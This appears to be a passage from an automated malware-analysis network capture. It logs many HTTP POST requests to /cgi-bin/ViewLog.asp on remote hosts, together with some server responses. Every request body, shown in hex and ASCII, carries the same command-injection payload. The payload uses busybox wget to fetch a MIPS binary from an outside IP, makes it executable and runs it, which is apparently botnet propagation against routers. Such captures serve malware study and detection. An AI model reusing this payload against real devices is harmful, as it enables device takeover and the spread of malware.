                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.475640059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.594367027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.962259054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.570158958 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.529666901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.449069023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              464192.168.2.144916894.73.65.1388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.931608915 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.124661922 CET322INHTTP/1.0 307 Temporary Redirect
                                              Content-Length: 0
                                              Content-Type: text/html
                                              Date: Thu, 23 Nov 2023 04:19:17 GMT
                                              Expires: Thu, 23 Nov 2023 04:19:17 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close
                                              Location: http://service.asdasd.it/insolventi


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              465192.168.2.146065094.130.106.2098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.933425903 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.129254103 CET460INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.10.3 (Ubuntu)
                                              Date: Thu, 23 Nov 2023 04:17:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 170
                                              Connection: close
                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              466192.168.2.145985062.87.204.1348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.934322119 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.147083044 CET560INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Content-Length: 341
                                              Connection: close
                                              Date: Thu, 23 Nov 2023 04:17:40 GMT
                                              Server: lighttpd/1.4.54
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              467192.168.2.146037062.195.240.908080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.939174891 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.151686907 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:17:41 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              468192.168.2.145894894.120.41.1228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.957257032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              469192.168.2.145490094.120.174.1898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.957469940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              470192.168.2.145218894.122.63.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.958307981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              471192.168.2.146007294.123.242.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.963160992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              472192.168.2.144918262.29.1.2378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.154658079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              473192.168.2.145496085.122.227.1368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.394805908 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.742398977 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              474192.168.2.143401831.33.140.1118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.683664083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.706293106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              475192.168.2.143494862.241.185.68080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.689131021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
